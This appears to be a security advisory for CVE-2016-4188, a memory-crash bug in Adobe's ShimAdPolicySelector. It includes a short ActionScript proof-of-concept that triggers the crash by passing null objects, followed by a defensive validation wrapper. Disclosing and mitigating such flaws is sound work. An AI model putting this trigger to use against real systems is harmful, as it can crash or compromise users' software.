II. Description
Normally, selectAdBreaksToPlay() should validate its parameter and return an error at the AS3 level if anything goes wrong.
However, if ShimAdPolicySelector is constructed with adPolicySelectorType=0, then invoking selectAdBreaksToPlay() with an invalid AdPolicyInfo instance leaves some inner fields of ShimAdPolicySelector absent, and dereferencing them causes a memory crash.
POC Source Code:
package
{
    import com.adobe.tvsdk.mediacore.MediaPlayerItem;
    import com.adobe.tvsdk.mediacore.timeline.advertising.policy.AdPolicyInfo;
    import com.adobe.tvsdk.mediacore.timeline.advertising.policy.ShimAdPolicySelector;
    import flash.display.Sprite;

    public class poc extends Sprite
    {
        public function poc()
        {
            // Both references are deliberately left uninitialized (null).
            var mp:MediaPlayerItem;
            var ap:AdPolicyInfo;
            // adPolicySelectorType=0 is the trigger condition described above.
            var obj:ShimAdPolicySelector = new ShimAdPolicySelector(0, mp);
            // The invalid AdPolicyInfo is passed through without AS3-level validation.
            obj.selectAdBreaksToPlay(ap);
        }
    }
}
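As an added defensive illustration (not part of the original advisory and not Adobe's SDK code), the following wrapper shows the AS3-level argument validation that the description says should happen before the call reaches native code, so that an embedding application raises an ArgumentError instead of reaching the absent inner fields. It assumes the constructor and method signatures seen in the PoC above; the type of the first constructor argument and the return type of selectAdBreaksToPlay() are not stated on the page and are treated here as int and untyped respectively, and the GuardedAdPolicySelector class name is hypothetical.

```actionscript
package
{
    import com.adobe.tvsdk.mediacore.MediaPlayerItem;
    import com.adobe.tvsdk.mediacore.timeline.advertising.policy.AdPolicyInfo;
    import com.adobe.tvsdk.mediacore.timeline.advertising.policy.ShimAdPolicySelector;

    // Hypothetical guard class (assumption: not part of the SDK). It validates
    // every argument in AS3 so a catchable error is raised here rather than a
    // fault inside the native selector.
    public class GuardedAdPolicySelector
    {
        private var _selector:ShimAdPolicySelector;

        // selectorType:int is an assumption; the PoC only shows the literal 0.
        public function GuardedAdPolicySelector(selectorType:int, item:MediaPlayerItem)
        {
            if (item == null)
            {
                throw new ArgumentError("MediaPlayerItem must not be null");
            }
            _selector = new ShimAdPolicySelector(selectorType, item);
        }

        // Rejects the invalid input the PoC uses; the wrapped native call only
        // runs with a non-null AdPolicyInfo. Return type is untyped because the
        // page does not state it.
        public function selectAdBreaksToPlay(info:AdPolicyInfo):*
        {
            if (info == null)
            {
                throw new ArgumentError("AdPolicyInfo must not be null");
            }
            return _selector.selectAdBreaksToPlay(info);
        }
    }
}
```

Such a wrapper is only defense in depth for applications that embed the SDK; the actual fix is the vendor update referenced in the credit section below.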
V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.
It has been assigned CVE-2016-4188 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-25.html